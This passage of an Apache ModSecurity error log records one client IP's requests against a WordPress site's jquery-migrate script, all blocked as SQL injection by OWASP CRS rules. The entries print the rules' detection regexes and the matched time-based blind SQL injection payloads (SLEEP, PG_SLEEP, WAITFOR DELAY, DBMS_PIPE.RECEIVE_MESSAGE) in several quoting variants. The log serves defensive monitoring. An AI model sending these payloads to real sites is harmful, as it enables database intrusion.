"OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMs5VyS4wZaDPTA77mPgAAAAo"] [Sun Aug 18 00:55:00.341230 2024] [:error] [pid 25549:tid 140110934755072] [client 92.51.2.78:60778] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: ') AND SLEEP(5) AND ('SOtT'='SOtT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMtJVyS4wZaDPTA77mPwAAABY"] [Sun Aug 18 00:55:00.503753 2024] [:error] [pid 26175:tid 140111035467520] [client 92.51.2.78:60780] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: ' AND SLEEP(5) AND 'XCDy'='XCDy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMtEusHEVNaz1QkYN6ZQAAAMo"] [Sun Aug 18 00:55:00.701660 2024] [:error] [pid 25551:tid 140111010289408] [client 92.51.2.78:60782] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: %' AND SLEEP(5) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMtCSCXpUXSc3dPnIU-AAAAI0"] [Sun Aug 18 00:55:00.832945 2024] [:error] [pid 25550:tid 140111094216448] [client 92.51.2.78:60784] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: AND SLEEP(5)-- eCjw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMtPn89YewL24c7_QPwgAAAEM"] [Sun Aug 18 00:55:01.285914 2024] [:error] [pid 26175:tid 140111060645632] [client 92.51.2.78:60786] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: ) AND 7061=(SELECT 7061 FROM PG_SLEEP(5)) AND (5484=5484"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMtUusHEVNaz1QkYN6ZgAAAMc"] [Sun Aug 18 00:55:01.412764 2024] [:error] [pid 26175:tid 140110959933184] [client 92.51.2.78:60788] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: AND 7061=(SELECT 7061 FROM PG_SLEEP(5))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMtUusHEVNaz1QkYN6ZwAAANM"] [Sun Aug 18 00:55:01.539954 2024] [:error] [pid 26175:tid 140111069038336] [client 92.51.2.78:60790] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: ') AND 7061=(SELECT 7061 FROM PG_SLEEP(5)) AND ('qwOc'='qwOc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMtUusHEVNaz1QkYN6aAAAAMY"] [Sun Aug 18 00:55:01.828517 2024] [:error] [pid 26175:tid 140111077431040] [client 92.51.2.78:60792] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: ' AND 7061=(SELECT 7061 FROM PG_SLEEP(5)) AND 'CwfP'='CwfP"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMtUusHEVNaz1QkYN6aQAAAMU"] [Sun Aug 18 00:55:02.063632 2024] [:error] [pid 26175:tid 140110985111296] [client 92.51.2.78:60794] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: %' AND 7061=(SELECT 7061 FROM PG_SLEEP(5)) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMtkusHEVNaz1QkYN6agAAANA"] [Sun Aug 18 00:55:02.211363 2024] [:error] [pid 26175:tid 140111001896704] [client 92.51.2.78:60796] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: AND 7061=(SELECT 7061 FROM PG_SLEEP(5))-- JPPh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMtkusHEVNaz1QkYN6awAAAM4"] [Sun Aug 18 00:55:02.373413 2024] [:error] [pid 26175:tid 140111018682112] [client 92.51.2.78:60798] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: ) WAITFOR DELAY '0:0:5' AND (6646=6646"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMtkusHEVNaz1QkYN6bAAAAMw"] [Sun Aug 18 00:55:02.697428 2024] [:error] [pid 25549:tid 140110959933184] [client 92.51.2.78:60800] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: WAITFOR DELAY '0:0:5'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMtpVyS4wZaDPTA77mQAAAABM"] [Sun Aug 18 00:55:02.994891 2024] [:error] [pid 26175:tid 140111043860224] [client 92.51.2.78:60802] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: ') WAITFOR DELAY '0:0:5' AND ('exID'='exID"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMtkusHEVNaz1QkYN6bQAAAMk"] [Sun Aug 18 00:55:03.208558 2024] [:error] [pid 25550:tid 140111174412032] [client 92.51.2.78:60804] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: ' WAITFOR DELAY '0:0:5' AND 'vrTW'='vrTW"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMt_n89YewL24c7_QPwwAAAEI"] [Sun Aug 18 00:55:03.565875 2024] [:error] [pid 25549:tid 140110976718592] [client 92.51.2.78:60806] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: %' WAITFOR DELAY '0:0:5' AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMt5VyS4wZaDPTA77mQQAAABE"] [Sun Aug 18 00:55:03.914762 2024] [:error] [pid 26175:tid 140110968325888] [client 92.51.2.78:60808] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: WAITFOR DELAY '0:0:5'-- SPKW"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMt0usHEVNaz1QkYN6bgAAANI"] [Sun Aug 18 00:55:04.248381 2024] [:error] [pid 26175:tid 140110917969664] [client 92.51.2.78:60810] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: ) AND 1229=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(71)||CHR(101)||CHR(69),5) AND (6703=6703"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMuEusHEVNaz1QkYN6bwAAANg"] [Sun Aug 18 00:55:04.626389 2024] [:error] [pid 26175:tid 140111027074816] [client 92.51.2.78:60812] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: AND 1229=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(71)||CHR(101)||CHR(69),5)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMuEusHEVNaz1QkYN6cAAAAMs"] [Sun Aug 18 00:55:04.858424 2024] [:error] [pid 26175:tid 140111191197440] [client 92.51.2.78:60814] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: ') AND 1229=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(71)||CHR(101)||CHR(69),5) AND ('qUjv'='qUjv"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMuEusHEVNaz1QkYN6cQAAAMA"] [Sun Aug 18 00:55:05.198363 2024] [:error] [pid 25551:tid 140111077431040] [client 92.51.2.78:60818] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: ' AND 1229=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(71)||CHR(101)||CHR(69),5) AND 'zeRQ'='zeRQ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMuSSCXpUXSc3dPnIU-QAAAIU"] [Sun Aug 18 00:55:05.477046 2024] [:error] [pid 26175:tid 140111094216448] [client 92.51.2.78:60820] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: %' AND 1229=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(71)||CHR(101)||CHR(69),5) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMuUusHEVNaz1QkYN6cgAAAMM"] [Sun Aug 18 00:55:05.732662 2024] [:error] [pid 26175:tid 140110993504000] [client 92.51.2.78:60822] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match 